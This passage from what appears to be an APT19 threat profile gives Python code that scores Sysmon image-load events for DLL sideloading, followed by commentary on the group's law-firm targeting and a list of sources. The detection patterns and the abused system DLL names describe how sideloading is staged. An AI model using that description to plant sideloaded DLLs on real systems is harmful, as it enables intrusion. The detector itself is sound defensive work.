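     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]

SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\(system32|syswow64|winsxs)\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
# DLL names that ship in System32 and are resolved through the search order whenever an
# application does not load them by absolute path. Abbreviated here (assumption); generate
# the real list from a golden image of your own Windows build.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptbase.dll", "profapi.dll"}
WEIGHTS = {"unsigned_dll_in_signed_process": 2, "system_dll_name_outside_system_dir": 2,
           "dll_in_user_writable_dir": 2, "signed_host_in_user_writable_dir": 1,
           "dll_beside_host_different_signer": 1}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def assess_image_load(event, host_signers):
    """Score one Event ID 7 record against the sideloading heuristics; None when nothing applies."""
    host, dll = event["Image"], event["ImageLoaded"]
    host_signer = host_signers.get(host)
    dll_signed = event.get("Signed") == "true" and event.get("SignatureStatus") == "Valid"
    in_system_dir = bool(SYSTEM_DIR_RE.match(dll))
    reasons = []
    if host_signer and not dll_signed:
        reasons.append("unsigned_dll_in_signed_process")
    if basename(dll) in SYSTEM_DLL_NAMES and not in_system_dir:
        reasons.append("system_dll_name_outside_system_dir")
    if USER_WRITABLE_RE.search(dll):
        reasons.append("dll_in_user_writable_dir")
    if host_signer and USER_WRITABLE_RE.search(host):
        reasons.append("signed_host_in_user_writable_dir")
    if dirname(dll) == dirname(host) and dll_signed and event.get("Signature") != host_signer:
        reasons.append("dll_beside_host_different_signer")
    if not reasons:
        return None
    return {"image": host, "image_loaded": dll, "reasons": reasons,
            "score": sum(WEIGHTS[r] for r in reasons)}


def scan_image_loads(events, host_signers, threshold=3):
    """Return the image loads whose combined weight reaches the threshold, in input order."""
    return [r for r in (assess_image_load(e, host_signers) for e in events)
            if r and r["score"] >= threshold]


if __name__ == "__main__":
    for r in scan_image_loads(SAMPLE_IMAGE_LOADS, HOST_SIGNERS):
        print(r["score"], basename(r["image"]), "loaded", r["image_loaded"], r["reasons"])
```

The first record is the textbook case from the profile: a signed vendor binary copied to a temp directory and loading an unsigned DLL of a system name beside it. The fourth shows the quieter variant, an unsigned system-named DLL dropped into the application's own Program Files directory, which still clears the threshold on the signer mismatch and name collision alone, and is the pattern an application control allow-list keyed on DLL path plus signer would block outright.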
APT19's targeting of law firms as a supply-chain vector for reaching otherwise well-defended corporate and government clients represents a strategic intelligence insight that distinguishes it from more blunt-instrument Chinese APT groups. The 2017 simultaneous targeting of seven firms — each a custodian of privileged client data across multiple defense, financial, and technology organizations — shows a mature operational understanding of how sensitive information flows in the professional services economy. Organizations that consider themselves "not a target" because they are a service provider rather than an end-stage intelligence target should reassess: if your firm holds privileged information about entities that are APT19 targets, you are by definition also a target. This threat model extends to consultants, auditors, M&A advisors, and any professional services firm with deep access to client proprietary information in APT19's sectors of interest.
Sources & Further Reading
Attribution and references used to build this profile.
- MITRE ATT&CK — Group G0073: APT19
- Mandiant (Google Cloud) — Privileges and Credentials: Phished at the Request of Counsel (2017)
- Palo Alto Unit 42 — New Attacks Linked to C0d0so0 Group (2016)
- Dark Reading — Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole (February 10, 2015)
- Threatpost — Chinese Hackers Compromised Forbes.com Using IE, Flash Zero-Days (February 10, 2015)
- SecureWorks — Bronze Firestone Threat Profile (Checkered Typhoon / APT19)
- Council on Foreign Relations — Cyber Operations Tracker: APT 19
- Malpedia — APT19 Actor Profile
- Microsoft MSTIC — Threat Actor Naming Mapping (Checkered Typhoon / Chlorine = APT19)